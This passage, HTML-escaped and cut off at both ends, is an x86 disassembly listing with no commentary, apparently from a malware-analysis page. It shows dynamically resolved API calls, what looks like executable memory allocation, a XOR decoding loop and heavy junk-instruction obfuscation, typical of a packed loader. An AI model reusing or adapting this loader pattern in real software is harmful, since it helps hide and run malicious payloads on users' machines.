/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,FF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,13&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,19&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,3F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,13&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;al,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[ebp-10]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [eax],dl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[ebp-08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[ebp-04]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jl&amp;nbsp;&amp;nbsp;&amp;nbsp;00401191&lt;br /&gt;&lt;br /&gt;l004012EC:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,[ebp+08]&lt;br /&gt;&lt;br /&gt;l004012EF:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;leave&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn004012F6()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D64&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;40&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00003000&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn0040131D()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D40&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+10]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn00401337()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416FD4&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+0C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+0C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004183D0],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;04&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+24]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn00401366()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D88&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn0040138C()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416DAC&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn004013A8()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416DD0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn004013C4()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edx,[004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,16&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,15&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,DE&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,16&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,1A&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,0B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,04&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,FF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;cx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;al,07&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;al,18&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,0B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,06&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,FF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;al,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416F38&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edx,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;al,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,0E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,12&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,18&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,07&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;al,16&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,12&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,05&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,07&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,66&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,1C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,0F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,16&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,3F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,08&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;al,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,1A&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,0F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,06&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,08&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,04&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;al,0E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,E7&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,62&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,18&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,000000E0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,10&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,0000009A&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,13&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,18&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,1C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;edx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn004014DE()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;al,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,0E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,12&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,18&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416FD4&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;al,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;cx&lt;br 